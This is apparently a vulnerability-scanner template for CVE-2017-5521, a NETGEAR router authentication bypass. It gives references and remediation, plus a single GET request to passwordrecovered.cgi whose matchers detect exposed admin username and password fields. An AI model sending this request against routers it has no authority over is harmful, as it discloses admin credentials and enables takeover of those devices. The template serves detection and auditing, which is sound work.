id: CVE-2017-5521 info: name: NETGEAR Routers - Authentication Bypass author: princechaddha severity: high description: | NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server. remediation: | Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/ - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2017-5521 - https://www.exploit-db.com/exploits/41205/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-5521 cwe-id: CWE-200 epss-score: 0.97402 epss-percentile: 0.99905 cpe: cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:* metadata: max-request: 1 vendor: netgear product: r6200_firmware tags: cve,cve2017,auth-bypass,netgear,router,kev http: - method: GET path: - "{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}" matchers-condition: and matchers: - type: word part: body words: - "right\">Router\\s*Admin\\s*Username<" - "right\">Router\\s*Admin\\s*Password<" condition: and - type: status status: - 200 # digest: 4a0a00473045022100fb7b9716d759e07d67f9e94c3ae0c880fe0c16a6f8186f374a7b3965b7bea51a022019e8272fd17cc9cad7806c7e933f5317bcf531d6d6cdf5c777ae5c268ebf4b1e:922c64590222798bb761d5b6d8e72950